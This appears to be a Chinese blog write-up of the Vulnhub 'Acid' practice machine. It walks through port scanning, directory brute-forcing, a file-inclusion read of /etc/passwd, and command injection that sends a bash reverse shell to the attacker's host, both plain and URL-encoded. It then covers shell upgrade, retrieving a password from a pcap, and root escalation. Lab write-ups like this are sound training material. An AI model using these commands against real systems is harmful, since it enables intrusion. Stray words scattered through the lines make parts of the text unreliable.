Vulnhub靶場滲透練習(四) Acid

利用namp 先進行掃描獲取ipphp

nmap  192.168.18.*python

獲取ip  沒發現80端口 主機存活  猜想能夠是個2000之後的端口瀏覽器

nmap -p1-65533 192.168.18.146     返回bash

192.168.18.146:33447 開放33447端口服務器

利用御劍和進行burpsuit 爆破 獲得tcp

imges ,index ,challenge 等目錄  接着對其二次爆破post

 

cake 發現目錄 /Magic_Boxui

訪問include.php,這是一個文件包含漏洞頁面
192.168.18.146:33447/Challenge/include.php?file=/etc/passwd&add=Extract+File

 繼續對/challenge /Magic_Box 爆破 發現 發現low.php,command.phpspa

 訪問low.php是個空頁面,訪問command.php,發現命令執行界面 這個時候直接反彈  3d

輸入 127.0.0.1&&echo "bash -i >& /dev/tcp/192.168.18.1/4444 0>&1" | bash     在post get 繼續傳遞的時候 && 會被當初參數傳遞

這裏咱們把 && 後門的轉義 以後在bp 發包

IP=127.0.0.1%26%26%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%38%2e%31%2f%34%34%34%34%20%30%3e%26%31%22%20%7c%20%62%61%73%68&submit=submit

 這邊接受到

接受輸入 python -c 'import pty;pty.spawn("/bin/bash")'

能夠執行su 命令終端 進去能夠提權了

查看有哪些的用戶 cat /etc/passwd ,發現須要關注的用戶有:acid,saman,root   通常查看 id 大於1000
find / -user acid 2>/dev/null   查找用戶文件
發現

將這個文件放到能夠訪問位置 利用python  搭建一個臨時服務器

cd  /sbin/raw_vs_isi

  python -m SimpleHTTPServer 8888 在瀏覽器中訪問  

能夠直接下載 也能夠利用  s

 scp  進行本地遠程下載

 scp /sbin/raw_vs_isi/hint.pcapng yzj@192.168.18.134:/home/yzj

Are you sure you want to continue connecting (yes/no)? yes

 yzj@192.168.18.134's password: a123456

成功  丟入 Wireshark 找到一個tcp 包 追蹤tcp流量包

發現saman的密碼:1337hax0r  su 切換
  

sudo -i   嘗試提權

發現root 密碼也是1337hax0r 

 查看cat flag.txt 

相關文章
相關標籤/搜索